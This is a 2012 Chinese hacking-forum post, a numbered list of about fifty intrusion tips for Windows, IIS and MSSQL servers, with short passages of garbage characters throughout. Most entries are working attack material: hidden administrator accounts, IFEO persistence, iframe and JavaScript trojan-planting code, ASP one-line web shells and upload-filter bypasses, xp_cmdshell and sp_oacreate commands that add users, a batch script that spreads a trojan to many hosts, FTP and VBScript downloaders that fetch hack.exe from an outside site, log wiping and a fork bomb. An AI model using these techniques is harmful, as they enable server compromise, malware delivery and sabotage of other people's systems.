找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2351|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,  I. G" ?0 A, t9 t$ G# U" O
cacls C:\windows\system32 /G hqw20:R0 f: h5 y: Y( _4 U1 x  \' a9 ^
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入' a# h$ t0 a0 O% e
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. L8 r# J0 X; o3 v$ K' t5 I2 E7 _
& I5 O/ M& V* _& T2 ]) A& e2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。5 N  T. x0 `6 L/ v' q- y8 I5 K
' u9 y; I6 W4 Y, ^
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 Z; V, {2 V- h
1 M& f) X3 q' Z! }4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号# c$ }  R2 q2 o" z. Y- ]

* w$ r# q2 V) m" i4 k5、利用INF文件来修改注册表0 w: p9 x& b; P' Z! L' s8 ^3 {
[Version]! U! p$ f9 A, ]4 _" V, U# X
Signature="$CHICAGO$"
5 P; ?% b' F( N/ `[Defaultinstall]
* s9 W7 t* [9 UaddREG=Ating
' w, E  a/ _8 o- B) k[Ating]
% C0 {7 {7 c. N1 T6 eHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
$ p; z1 S- e/ o以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: U9 Y% b; H/ c' F  G7 i3 Trundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
9 \4 [6 v4 W9 u1 e, Y2 S! k; \其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU+ m" k# U  h' C
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
/ s8 H: v$ p0 n2 z$ SHKEY_CURRENT_CONFIG 简写为 HKCC
8 k1 _% q( n: W0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
7 N* `9 V9 y* l, @. b0 R" G- p$ \"1"这里代表是写入或删除注册表键值中的具体数据
6 W# J+ h3 y* R; P
% v. n9 D# U* X# [) d# c4 |2 p6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
" C. T3 B. p6 e, n8 a4 x8 R多了一步就是在防火墙里添加个端口,然后导出其键值$ o& \* g6 Y' j$ W# j% ^! ^
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]6 O0 [3 i3 L: \# [$ i& v

  f- A6 y. W, g, ~( C" |7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% v4 E( i0 s3 S+ p! R9 _在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。9 e- W- `* y" t* @5 c: F

/ f* q* U  c2 ?( i# d2 X5 h8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。+ u9 z' W! {; t2 J
1 e1 h- F9 T; `" j
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
' e. v( C8 K  E, }) {  a5 D$ b可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。6 y) |/ m2 D7 j5 @

9 }- h' [; W9 f* ]3 G10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
& ~" h6 o8 P: J0 Q  v% @) P. t) t9 {2 Q' v- ^2 T7 H; f+ e: R
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,$ U% k) I8 V: i: n) G( s' v
用法:xsniff –pass –hide –log pass.txt0 {# R; s4 g7 T- l( c* S& x$ c

% ~5 `2 Q$ B# l/ @9 t' P12、google搜索的艺术
, R6 d3 A. t" |' t8 w+ G搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
% Q% O8 s, e' M: Q或“字符串的语法错误”可以找到很多sql注入漏洞。
/ T5 F' b3 X9 M! \; b
) v4 ]4 u6 G( B( v8 w8 J* o13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。1 h6 F0 _4 x! D6 ]9 l, l: S, Y+ \& `) k

/ I$ H# H9 ~2 l7 x. P- K1 G14、cmd中输入 nc –vv –l –p 1987
0 `' ?$ \, O* o2 {6 b6 N7 L6 O9 _做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃2 c3 e) B1 N) ]: z" S$ T- Y
9 ?; N# Q% ?: O
15、制作T++木马,先写个ating.hta文件,内容为
& ?* s; d7 k1 v# |; y<script language="VBScript">
# r" I% p. u* u! xset wshshell=createobject ("wscript.shell" )! V/ S/ g5 d# ?
a=wshshell.run("你马的名称",1)! [+ @/ j7 x( ]9 k# m$ D
window.close: H' l2 j! ^! M. u
</script>6 r; y$ H. S! e" s3 A7 C. @+ m5 g" N% [
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。; m. f! h, @$ u% @2 g  X

+ M* F- c: b" {, A8 M9 b0 v16、搜索栏里输入9 N" a/ e6 d9 q; C, l8 ^
关键字%'and 1=1 and '%'='
4 U7 |# ~$ K& j关键字%'and 1=2 and '%'='
* G+ j) h4 G" W6 ?( `比较不同处 可以作为注入的特征字符* @; z5 a' H0 s/ F" M
. ?5 w6 o  D3 D$ K) ]
17、挂马代码<html>' |  @6 a% K" C0 r+ r. {
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>' Z# m/ F0 p& b7 L
</html>
: s2 Q9 W$ J2 b0 o0 }* v# d! X# j% u0 ^# T' c7 O6 q
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
: H6 O. L4 f6 ]/ Qnet localgroup administrators还是可以看出Guest是管理员来。1 L& E8 M  p# r

0 k) A0 r- K& E19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
" B7 ^9 G7 s3 ?) p) v用法: 安装: instsrv.exe 服务名称 路径3 ?; \7 l; `" v8 D) Y/ ]# N
卸载: instsrv.exe 服务名称 REMOVE3 v( ^/ d; N& R; {( r7 o

) s/ r0 U3 d, z
$ H: i7 x5 x+ A" v21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 Y* I; l: a/ }& H: I; a+ |0 Z不能注入时要第一时间想到%5c暴库。, d# i- H1 F/ X- R

6 @2 K: Y+ T# P- P. I22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
4 h5 Q0 t* `" k3 C6 r" I
' b0 R0 }  u  _% h! q, J23、缺少xp_cmdshell时
( X) q  T6 @2 {8 D* _2 @- Q尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# \4 S6 B- R$ A5 H" g0 _
假如恢复不成功,可以尝试直接加用户(针对开3389的)6 s( @0 N! u: M9 S
declare @o int5 O2 s. R: O9 x, \' D9 q( }+ q2 c
exec sp_oacreate 'wscript.shell',@o out4 u( @) V5 X/ A! P% r: [" P& k' l) h
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员8 f& y  f2 t+ U+ a* W  v; e7 B
7 l4 e2 w# c2 |$ x) ^& o, X
24.批量种植木马.bat
: {5 z0 d& V1 t; `* k! y+ Y& cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
) g5 P' ?* G; I, x5 Efor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
/ f* c& w: k! I6 y* m扫描地址.txt里每个主机名一行 用\\开头
2 T2 j1 q; L% v# g5 ]' x2 ], P4 t' l" W3 T3 f" ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
8 C9 S9 \. s0 @
7 q/ v8 @( P5 N4 n( B26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ {0 X1 X! P2 z: Y  h+ }将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
- P; g, g) K0 B6 p/ Z5 o3 m. R6 y) J.cer 等后缀的文件夹下都可以运行任何后缀的asp木马& s1 ]$ w% W3 ~/ z
% ?& |; p; A  z' b
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
. Y1 h) Y1 f' K1 G, T. l然后用#clear logg和#clear line vty *删除日志. t$ I# _( H+ p# J

- ]6 k2 Y- N* z3 Y. ~0 k" F28、电脑坏了省去重新安装系统的方法
  ?7 A/ ?: F( T/ y纯dos下执行,
4 d( H( w9 W. S2 g7 Nxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config; u% N2 j3 Q* }. V9 h1 O6 @0 U
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
& F' T3 [$ i3 Y- k' N+ W+ f( U
. B) {6 p3 p8 G) Y0 O  ?29、解决TCP/IP筛选 在注册表里有三处,分别是:
, {% r! f, L( a; r& X' XHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
4 o% c$ y5 E- b! o4 Y- h, A- ?( OHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( X  }& s) J! [5 ?3 o% @HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# i: X4 I  o0 [/ {: x$ S* j% N3 B分别用; j8 [* c& r: B
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# s, ]- w$ ]4 i
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- m! u# d4 e# S7 _, o  zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 K# {8 J! C# T" S" L6 d命令来导出注册表项
! m+ D& m# f6 v然后把三个文件里的EnableSecurityFilters"=dword:00000001,
' b# a0 C; g6 D/ f2 d( F改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用$ B) G- s. B9 H" w* }1 t, A
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。+ r" B4 K( h- T- \
, D/ G4 g5 C& e: N0 c/ |  z- ]8 o
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U' q8 u0 [. N0 _8 b1 }( P
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的30 s4 |& ^) v; i* i0 ?' Y8 J# A. L

$ J! m% ~! O: m$ \, `31、全手工打造开3389工具
* ]9 j  j8 P7 y' i* I3 I+ F" I+ u打开记事本,编辑内容如下:: u0 B% q3 ?" u- A) f, Q, x  I
echo [Components] > c:\sql
4 y' s0 |* h3 R' ^- A# Qecho TSEnable = on >> c:\sql' {0 d& t1 w3 l* |7 X
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q. U& Z; T  H9 e7 A3 \
编辑好后存为BAT文件,上传至肉鸡,执行8 |* j' X; \9 t5 B  D, T

, Z  L, J% m2 r7 k32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
6 ~! S4 O) n) \  C0 K+ o! T. u2 f' L5 S% d4 D
33、让服务器重启" g. c6 Z9 V4 n  j/ c, M& B
写个bat死循环:
$ C: x$ o( D$ Z& [% C" @4 D@echo off4 f5 k6 v1 j% {2 ~% R
:loop1% G- P: l, H  F! K
cls$ D0 i4 h# h8 \) B6 I6 i
start cmd.exe. Q# E$ l3 N% |8 D
goto loop1
" w5 q* u7 _/ j4 e1 G9 W, p+ s; E' p保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
( ?/ `! T; u( A# a! x- w* W4 [" n8 S, _6 l$ _  ~) U2 Q
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
1 P. r0 G1 ~- ~) d3 \; T9 I@echo off
9 l5 _/ O, F7 A- @* Xdate /t >c:/3389.txt
% m2 ]' O5 \0 I9 j% ^time /t >>c:/3389.txt
1 s5 \% u  V8 s/ I4 S5 zattrib +s +h c:/3389.bat
7 a8 N! t& ]; W6 }0 K% S. g# G* k/ Iattrib +s +h c:/3389.txt
7 U/ W, g2 `2 A; inetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt* v( M6 @9 y- Q0 w* {! e0 x* \7 D, T
并保存为3389.bat+ l0 I; M3 D- g, \# T7 Z: o* q. ^
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
& e4 Q) n" D4 t8 [, p$ f5 B- G
6 N" Z3 S. g! Z( B$ _7 I" b1 m35、有时候提不了权限的话,试试这个命令,在命令行里输入:
  E0 X5 ?6 B# [- W; u2 q3 Y8 W) W: `start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)1 x' ?6 \  U0 w+ f/ @
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
2 y, P! n$ E  ]4 [9 W8 f) u3 k) `2 @9 b) S5 z6 q/ O: S
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: N0 T) Q- Y; `; K1 ^/ `+ f- lecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址7 P) q( G7 R" s; B% m4 _' Q, |
echo 你的FTP账号 >>c:\1.bat //输入账号" L. Y& |' W" Q
echo 你的FTP密码 >>c:\1.bat //输入密码( J7 R4 y3 _# G% u" @1 C
echo bin >>c:\1.bat //登入
' c% B8 i4 i$ X# f! zecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么0 l& J1 n9 M  l4 b, I  D8 n
echo bye >>c:\1.bat //退出* v" F7 z) ]$ a  _) f7 {. D
然后执行ftp -s:c:\1.bat即可
8 E8 Q. L7 q3 n" g7 d) z( j# e- s5 R$ i4 o  h
37、修改注册表开3389两法) V# _6 E! E7 h( Y7 e
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表2 D# o( N" w, z- A2 e
echo Windows Registry Editor Version 5.00 >>3389.reg) Y; d* c1 E7 ?8 J. C8 ^5 s% e: N; R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
/ \& E/ W# S+ K: n% a1 Jecho "Enabled"="0" >>3389.reg9 ?& h& \. c# _3 E1 u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 p: a/ @2 C7 }
NT\CurrentVersion\Winlogon] >>3389.reg4 _4 y# _' ]0 q- W! E" Z
echo "ShutdownWithoutLogon"="0" >>3389.reg' l+ R( [  M1 N+ F9 _( M/ R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]/ H( K# Z/ H' w$ b4 ?" ^4 E- l
>>3389.reg/ x3 D0 E, V0 s* [" v  m2 X7 W
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 a. X! H& O; `) G2 {  {) D& w' y4 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]1 G5 V' j& ?$ L- y- i
>>3389.reg/ A6 V5 E4 `% V% a0 V
echo "TSEnabled"=dword:00000001 >>3389.reg4 O( s0 S) x1 r9 \) t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
8 Q5 e3 g: x# Uecho "Start"=dword:00000002 >>3389.reg+ Q& W! z% D+ C: }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
) {- h8 d- V; T>>3389.reg3 j9 n9 w2 s- |7 M0 L, }
echo "Start"=dword:00000002 >>3389.reg9 r' d7 L" n7 k- X! K" q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
8 P) H* d7 @. G# Zecho "Hotkey"="1" >>3389.reg( a4 u; L: n) A" X9 l; b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ F6 L  J0 E9 a1 u8 `2 p# \Server\Wds\rdpwd\Tds\tcp] >>3389.reg9 y" O( o0 M$ k- m3 q' Y
echo "PortNumber"=dword:00000D3D >>3389.reg
/ Q" e5 M0 G# ^6 yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ @4 y9 Z9 C/ J7 F0 a6 u& uServer\WinStations\RDP-Tcp] >>3389.reg+ [4 t) n! G+ l- j' u$ B, C* z
echo "PortNumber"=dword:00000D3D >>3389.reg; L- r- [7 {0 d* r; x& A+ r& i
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。/ A4 Z8 H6 ?  c
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)1 L2 {, j8 Z3 Z
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效; _5 x- m' O- y' T4 L. Q+ a
(2)winxp和win2003终端开启- X8 Z2 p8 |' N& L# m0 r( W
用以下ECHO代码写一个REG文件:
. f2 w  y$ P6 g% ?. q5 ?0 }2 Pecho Windows Registry Editor Version 5.00>>3389.reg
9 ]8 w$ L, K( |3 Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ V8 U* @1 K) m4 V, W1 b. H
Server]>>3389.reg
. w( C- G- r6 [; L; A' Mecho "fDenyTSConnections"=dword:00000000>>3389.reg- M( d) F2 l! R# F  o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& U5 G' ?7 [" z4 }% j: W8 p
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
+ [  ^/ V7 a( e  p8 I+ k9 W. becho "PortNumber"=dword:00000d3d>>3389.reg! L' M2 F/ `* M% q/ [' S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" d) s0 s3 s) N. b
Server\WinStations\RDP-Tcp]>>3389.reg1 W* `+ `! ^% Q) a( ~4 T2 a
echo "PortNumber"=dword:00000d3d>>3389.reg( {, L% d- b; F* B7 Q( y, r: e
然后regedit /s 3389.reg del 3389.reg
! b6 x8 `  l% n* ?9 hXP下不论开终端还是改终端端口都不需重启& x" g/ a: ]: t

. |* i# l) K1 e38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 y5 E4 k0 Z: ]$ T. E用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) F  [: P# q) F5 A- z/ P+ e) `/ X$ V; j
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!6 Y3 @( Z* e; S6 d0 m; b
(1)数据库文件名应复杂并要有特殊字符
% u5 X. P) o$ O) ](2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 H3 o9 }7 A" b0 r4 R将conn.asp文档中的
: a; X' M4 [# e* ~- x1 LDBPath = Server.MapPath("数据库.mdb")
$ [/ O8 K( O' ~6 V# n1 vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath, }8 M6 A: d" n* l2 T
+ J2 [5 ~. W. y
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置6 f+ K$ K0 d3 {+ W8 h, R
(3)不放在WEB目录里# u. L/ f+ X* l

/ @( Z% v6 F* S$ d( Q* T# q40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉$ |- z  k, E) T5 u
可以写两个bat文件) f; m! O; _& i' D$ B" e' y
@echo off
. [+ _4 l8 j* M& Y1 n, B' w$ @4 I@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
8 n8 y+ T* ?9 t" z! C@del c:\winnt\system32\query.exe1 a8 x7 V" m+ w! u5 @
@del %SYSTEMROOT%\system32\dllcache\query.exe
4 |& U9 o- |4 c@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的* _0 M8 y3 v& l2 e- h0 I% U
* [, n8 ?4 G: g3 d
@echo off$ l; ~) Z% a5 G8 N; o
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe2 b0 i- g, K: |3 _# ~1 z3 q9 b
@del c:\winnt\system32\tsadmin.exe: e  l( o/ `$ M2 |9 y! o  p
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex& o7 X# q6 h2 d2 a& F6 I

% E1 o5 r( k( D& k3 t2 o41、映射对方盘符! d' X6 I& E1 X; P
telnet到他的机器上,
$ _( R3 v; C' t$ k0 q- Ynet share 查看有没有默认共享 如果没有,那么就接着运行; |0 g& d4 q6 j) F
net share c$=c:
; p0 ]9 [+ _( D) K+ J9 [. Z8 A8 unet share现在有c$; `$ N7 S8 S7 W/ |2 g" ^6 G
在自己的机器上运行( p/ E$ V4 ~6 Q, _9 J, q7 h
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ B' e3 d' m, R: O
9 k( _7 _& P/ F! \3 o* K" |42、一些很有用的老知识( C7 o8 s- D1 ~+ ~2 i& ?
type c:\boot.ini ( 查看系统版本 )
# {- `) O% j$ O/ l& mnet start (查看已经启动的服务), p# u% }- }, b0 E
query user ( 查看当前终端连接 )6 e  ]+ u; \% N# g! P! ?
net user ( 查看当前用户 )
( D7 m( i* W5 E" M0 T$ ]8 Cnet user 用户 密码/add ( 建立账号 )
! A7 j- D% ^  Z7 \# c$ }' S# |net localgroup administrators 用户 /add (提升某用户为管理员)* S/ p) @# h, \, D; s. h' E5 \
ipconfig -all ( 查看IP什么的 )  d4 H5 J6 z, |/ G
netstat -an ( 查看当前网络状态 )
9 n4 ?3 U' v, pfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
7 z; J0 {' Z$ J6 t! ~克隆时Administrator对应1F4
" z& S  D5 E6 Gguest对应1F5
3 }2 b$ ^- N+ vtsinternetuser对应3E8
5 `$ E# D- u) }, E3 R2 Q# V  A' e4 a2 v: g2 R4 _
43、如果对方没开3389,但是装了Remote Administrator Service
2 b; p$ b( v0 ~: a" S$ J) p0 o用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接5 M4 C/ C7 t; F
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
! n) d* x$ W; @% L: v( }2 c7 i; S1 K先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' \  n: c1 q( p  S

4 Y/ ?* p" O5 S5 C; u9 A1 Y44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定): ]9 b% @) o0 D( d  K" Z- k
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)$ p( |4 }. `' a+ c* P
2 J0 U! p3 M+ W/ a
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)/ c7 D# U3 Q3 Q1 a1 w
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# @5 i# w( F/ J/ x5 I% Q^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
% B- c1 y! V6 tCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =. L9 c7 b7 d+ P0 I! B" B1 t
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ b% D3 z$ |1 u4 Y% v* z(这是完整的一句话,其中没有换行符)6 }* [2 u4 p; Y3 k1 @. @/ _
然后下载:) r0 b' B- F% `$ P' F# o1 j
cscript down.vbs http://www.hack520.org/hack.exe hack.exe! g( z$ @+ Z7 X' S/ m. I6 u; W( B
8 N4 a$ h% e" c- J$ s; t0 S
46、一句话木马成功依赖于两个条件:
9 T6 h, q% K; m8 w4 ?5 e1、服务端没有禁止adodb.Stream或FSO组件
# h; K. j/ {8 ]2 M0 D1 D5 a" n& W2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。7 }, d( n: Y6 X

& I1 o4 U" p) s47、利用DB_OWNER权限进行手工备份一句话木马的代码:
0 P$ x: M4 ^% o* G% D+ r;alter database utsz set RECOVERY FULL--0 @. B3 F$ F% z7 |' C
;create table cmd (a image)--
: e0 _( c) r; r% m;backup log utsz to disk = 'D:\cmd' with init--
) j% v8 u. t, \5 ?4 D" l! ^. c;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! s. u7 u, J9 d/ S" v! m) y
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
5 F' ?/ ?1 H* N% q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。) c( N# j, J4 [

8 o0 z' ?0 G  E( Y1 x# q8 q* e9 q2 V48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:1 s9 o; Q: B8 L3 c5 O0 o5 y. B
1 O1 B: v2 e1 F' [/ h  I
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ S6 B/ K) h* ]3 r- x0 J) Z
所有会话用 'all'。& K/ G! t- k9 Q* N5 _
-s sessionid 列出会话的信息。6 @: E* y1 _: k4 u4 `" I) \
-k sessionid 终止会话。
; W/ D0 \* e1 b& q& {% C6 Y, g-m sessionid 发送消息到会话。
2 e( y( O- f' w+ R5 l* E: \; N" h5 s% i
config 配置 telnet 服务器参数。5 Y% d* X" A4 ~' I5 {

# ^, U1 s' p: n7 F$ M. e: F: ]common_options 为:
. A7 ~2 f  N; z8 X) V-u user 指定要使用其凭据的用户5 L' }- P  U4 t5 \& Q& \1 K! I
-p password 用户密码* V* L7 k; H  p4 R' H" X

5 d% I5 N) i% Bconfig_options 为:. [1 m5 o3 y) C
dom = domain 设定用户的默认域
. V4 d$ b0 E% q& Ictrlakeymap = yes|no 设定 ALT 键的映射
3 o$ `0 Z0 u8 t- m2 p; s/ W9 Ztimeout = hh:mm:ss 设定空闲会话超时值
6 p8 r  Q( x+ \timeoutactive = yes|no 启用空闲会话。3 }; m3 u, E9 S1 `
maxfail = attempts 设定断开前失败的登录企图数。  o, T8 A( M7 d# y: c
maxconn = connections 设定最大连接数。2 \: z2 @" J& h1 Z7 x9 B. R
port = number 设定 telnet 端口。
" C6 Y: j" H: G) R" isec = [+/-]NTLM [+/-]passwd
* \: q0 c) a; N; w' a! m设定身份验证机构6 [) s6 T$ o9 U- p4 B) I/ q
fname = file 指定审计文件名。* Y1 u; T3 ^) W, }/ ^, |! v
fsize = size 指定审计文件的最大尺寸(MB)。
% C2 K( e2 Z$ @+ [% O$ gmode = console|stream 指定操作模式。. n, ?! @' {8 ]% [9 Y5 Z
auditlocation = eventlog|file|both! l3 ?& B2 v/ W. s2 D5 U( ?
指定记录地点
4 J* p! b4 H% H# V' T# daudit = [+/-]user [+/-]fail [+/-]admin
: a7 C; L3 p0 d1 B+ @) e4 U% x
) j, U7 @* D/ c. F6 ?49、例如:在IE上访问:2 Q* i5 f8 V% A& T$ n
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
" i2 W: x3 c& H7 Z1 t1 e0 fhack.txt里面的代码是:! r0 ~8 l7 [: ~! e; B+ w* t
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">1 ?' t; o" ]  Z" p3 t; N
把这个hack.txt发到你空间就可以了!; `7 e" R! l$ [9 R; Z5 k
这个可以利用来做网马哦!
& i9 P, a2 j$ |+ `- s; t% [5 M! A2 Q0 ?1 R' I; u1 |$ h, w! `
50、autorun的病毒可以通过手动限制!
3 h. E0 X# Y6 \4 r8 @8 R1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 C- z- O. a; Y0 D2,打开盘符用右键打开!切忌双击盘符~+ c) D( ]" g$ R
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
0 c9 [" J* m4 ~# N6 G- i( j  W! r" X  d: h# ]7 G! B
51、log备份时的一句话木马:4 l# b: V& B: i1 f& [
a).<%%25Execute(request("go"))%%25>
& K' m% W7 B& y. qb).<%Execute(request("go"))%>5 D5 \" p2 y0 e. y7 N6 I
c).%><%execute request("go")%><%
